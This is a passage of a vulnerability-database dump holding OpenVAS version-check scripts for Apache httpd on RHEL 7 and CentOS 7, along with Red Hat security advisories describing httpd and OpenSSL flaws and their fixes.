of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871799\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-13 06:32:47 +0200 (Thu, 13 Apr 2017)\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for httpd RHSA-2017:0906-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP\n Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n * It was discovered that the mod_session_crypto module of httpd did not use\nany mechanisms to verify integrity of the encrypted session data stored in\nthe user's browser. A remote attacker could use this flaw to decrypt and\nmodify session data using a padding oracle attack. (CVE-2016-0736)\n\n * It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could use\nthis flaw to cause httpd child processes to repeatedly crash if the server\nused HTTP digest authentication. (CVE-2016-2161)\n\n * It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in conjunction\nwith a proxy or backend server that interpreted those characters\ndifferently, a remote attacker could possibly use this flaw to inject data\ninto HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400 Bad\nRequest' error to HTTP clients which do not strictly follow HTTP protocol\nspecification. A newly introduced configuration directive\n'HttpProtocolOptions Unsafe' can be used to re-enable the old less strict\nparsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es):\n\n * When waking up child processes during a graceful restart, the httpd\nparent process could attempt to open more connections than necessary if a\nlarge number of child processes had been active prior to the restart.\nConsequently, a graceful restart could take a long time to complete. With\nthis update, httpd has been fixed to limit the number of connections opened\nduring a graceful restart to the number of active children, and the\ndescribed problem no longer occurs. (BZ#1420002)\n\n * Previously, httpd running in a container returned the 500 HTTP status\ncode (Internal Server Error) when a connection to a WebSocket server was\nclosed. As a consequence, the httpd server failed to deliver the correct\nHTTP status and data to a client. With this update, httpd correctly handles\nall proxied requests to the WebSocket server, and the described problem no\nlonger occurs. (BZ#1429947)\n\n * In a configuration using LDAP authentication with the mod_authnz_ldap\nmodule, the name set using the AuthLDAPBindDN directive was not correctly\nused to bind to the LDAP server for all queries. Consequently,\nauthorization attempts failed. The LDAP modules have been fixed to ensure\nthe configured name is correctly bound for LDAP queries, and authorization\nusing LDAP no longer fails. (BZ#1420047)\");\n script_tag(name:\"affected\", value:\"httpd on\n Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0906-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-April/msg00021.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "Check the version of httpd", "modified": "2019-03-08T00:00:00", "published": "2017-04-14T00:00:00", "id": "OPENVAS:1361412562310882692", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882692", "type": "openvas", "title": "CentOS Update for httpd CESA-2017:0906 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2017:0906 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882692\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-14 06:30:21 +0200 (Fri, 14 Apr 2017)\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for httpd CESA-2017:0906 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of httpd\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP\nServer, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n * It was discovered that the mod_session_crypto module of httpd did not use\nany mechanisms to verify integrity of the encrypted session data stored in\nthe user's browser. A remote attacker could use this flaw to decrypt and\nmodify session data using a padding oracle attack. (CVE-2016-0736)\n\n * It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could use\nthis flaw to cause httpd child processes to repeatedly crash if the server\nused HTTP digest authentication. (CVE-2016-2161)\n\n * It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in conjunction\nwith a proxy or backend server that interpreted those characters\ndifferently, a remote attacker could possibly use this flaw to inject data\ninto HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400 Bad\nRequest' error to HTTP clients which do not strictly follow HTTP protocol\nspecification. A newly introduced configuration directive\n'HttpProtocolOptions Unsafe' can be used to re-enable the old less strict\nparsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es):\n\n * When waking up child processes during a graceful restart, the httpd\nparent process could attempt to open more connections than necessary if a\nlarge number of child processes had been active prior to the restart.\nConsequently, a graceful restart could take a long time to complete. With\nthis update, httpd has been fixed to limit the number of connections opened\nduring a graceful restart to the number of active children, and the\ndescribed problem no longer occurs. (BZ#1420002)\n\n * Previously, httpd running in a container returned the 500 HTTP status\ncode (Internal Server Error) when a connection to a WebSocket server was\nclosed. As a consequence, the httpd server failed to deliver the correct\nHTTP status and data to a client. With this update, httpd correctly handles\nall proxied requests to the WebSocket server, and the described problem no\nlonger occurs. (BZ#1429947)\n\n * In a configuration using LDAP authentication with the mod_authnz_ldap\nmodule, the name set using the AuthLDAPBindDN directive was not correctly\nused to bind to the LDAP server for all queries. Consequently,\nauthorization attempts failed. The LDAP modules have been fixed to ensure\nthe configured name is correctly bound for LDAP queries, and authorization\nusing LDAP no longer fails. (BZ#1420047)\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0906\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-April/022380.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ldap\", rpm:\"mod_ldap~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_proxy_html\", rpm:\"mod_proxy_html~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_session\", rpm:\"mod_session~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-17T14:27:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3583"], "description": "This host is installed with Apache HTTP Server\n and is prone to denial of service vulnerability.", "modified": "2019-07-05T00:00:00", "published": "2015-05-27T00:00:00", "id": "OPENVAS:1361412562310805636", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805636", "type": "openvas", "title": "Apache HTTP Server Mod_Proxi_Fcgi Denial of service Vulnerability May15", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache HTTP Server Mod_Proxi_Fcgi Denial of service Vulnerability May15\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805636\");\n script_version(\"2019-07-05T09:54:18+0000\");\n script_cve_id(\"CVE-2014-3583\");\n script_bugtraq_id(71657);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:54:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 12:15:46 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\"); # Only vulnerable if mod_proxy_fcgi is enabled\n script_name(\"Apache HTTP Server Mod_Proxi_Fcgi Denial of service Vulnerability May15\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache HTTP Server\n and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to an out-of-bounds read\n condition in the 'handle_headers' function in mod_proxy_fcgi that is triggered\n as user-supplied input is not properly validated when handling responses from\n FastCGI servers.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attackers to cause a denial of service via specially crafted response.\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP Server version 2.4.10.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 2.4.12 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1163555\");\n script_xref(name:\"URL\", value:\"http://httpd.apache.org/security/vulnerabilities_24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_mandatory_keys(\"apache/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!httpd_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!httpd_ver = get_app_version(cpe:CPE, port:httpd_port)){\n exit(0);\n}\n\nif(version_is_equal(version:httpd_ver, test_version:\"2.4.10\"))\n{\n report = 'Installed version: ' + httpd_ver + '\\n' +\n 'Fixed version: ' + \"2.4.12\" + '\\n';\n security_message(data:report, port:httpd_port);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2020-08-27T02:07:03", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-1546", "CVE-2016-2161", "CVE-2016-8740", "CVE-2016-8743", "CVE-2020-11985"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. The httpd24 packages provide a recent stable release of version 2.4 of the Apache HTTP Server, along with the mod_auth_kerb module.\n\nThe httpd24 Software Collection has been upgraded to version 2.4.25, which provides a number of bug fixes and enhancements over the previous version. For detailed changes, see the Red Hat Software Collections 2.4 Release Notes linked from the References section. (BZ#1404778)\n\nSecurity Fix(es):\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* A denial of service flaw was found in httpd's mod_http2 module. A remote attacker could use this flaw to block server threads for long times, causing starvation of worker threads, by manipulating the flow control windows on streams. (CVE-2016-1546)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return \"400 Bad Request\" error to HTTP clients which do not strictly follow HTTP protocol specification. A newly introduced configuration directive \"HttpProtocolOptions Unsafe\" can be used to re-enable the old less strict parsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. (CVE-2016-8740)", "modified": "2020-08-27T05:54:32", "published": "2017-04-26T13:54:23", "id": "RHSA-2017:1161", "href": "https://access.redhat.com/errata/RHSA-2017:1161", "type": "redhat", "title": "(RHSA-2017:1161) Moderate: httpd24-httpd security, bug fix, and enhancement update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-17T07:36:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-4975", "CVE-2016-8743"], "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return \"400 Bad Request\" error to HTTP clients which do not strictly follow HTTP protocol specification. A newly introduced configuration directive \"HttpProtocolOptions Unsafe\" can be used to re-enable the old less strict parsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es):\n\n* When waking up child processes during a graceful restart, the httpd parent process could attempt to open more connections than necessary if a large number of child processes had been active prior to the restart. Consequently, a graceful restart could take a long time to complete. With this update, httpd has been fixed to limit the number of connections opened during a graceful restart to the number of active children, and the described problem no longer occurs. (BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP status code (Internal Server Error) when a connection to a WebSocket server was closed. As a consequence, the httpd server failed to deliver the correct HTTP status and data to a client. With this update, httpd correctly handles all proxied requests to the WebSocket server, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the mod_authnz_ldap module, the name set using the AuthLDAPBindDN directive was not correctly used to bind to the LDAP server for all queries. Consequently, authorization attempts failed. The LDAP modules have been fixed to ensure the configured name is correctly bound for LDAP queries, and authorization using LDAP no longer fails. (BZ#1420047)", "modified": "2020-01-17T12:05:59", "published": "2017-04-12T14:02:46", "id": "RHSA-2017:0906", "href": "https://access.redhat.com/errata/RHSA-2017:0906", "type": "redhat", "title": "(RHSA-2017:0906) Moderate: httpd security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T14:35:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-6304", "CVE-2016-7056", "CVE-2016-8610", "CVE-2016-8740", "CVE-2016-8743"], "description": "Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.\n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a malicious user with local access to recover ECDSA P-256 private keys. (CVE-2016-7056)\n\n* A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. (CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. (CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304.", "modified": "2017-07-25T00:12:41", "published": "2017-06-07T21:34:13", "id": "RHSA-2017:1415", "href": "https://access.redhat.com/errata/RHSA-2017:1415", "type": "redhat", "title": "(RHSA-2017:1415) Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:47:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-6304", "CVE-2016-7056", "CVE-2016-8610", "CVE-2016-8740", "CVE-2016-8743"], "description": "Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.\n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a malicious user with local access to recover ECDSA P-256 private keys. (CVE-2016-7056)\n\n* A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. (CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. (CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304.", "modified": "2017-06-07T21:36:42", "published": "2017-06-07T21:33:56", "id": "RHSA-2017:1414", "href": "https://access.redhat.com/errata/RHSA-2017:1414", "type": "redhat", "title": "(RHSA-2017:1414) Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 6", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:46:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-6304", "CVE-2016-7056", "CVE-2016-8610", "CVE-2016-8740", "CVE-2016-8743"], "description": "Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.\n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a malicious user with local access to recover ECDSA P-256 private keys. (CVE-2016-7056)\n\n* A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. (CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. (CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304.", "modified": "2017-06-07T21:35:54", "published": "2017-06-07T21:33:35", "id": "RHSA-2017:1413", "href": "https://access.redhat.com/errata/RHSA-2017:1413", "type": "redhat", "title": "(RHSA-2017:1413) Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 7", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T14:34:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3583"], "description": "Red Hat Ceph Storage is a 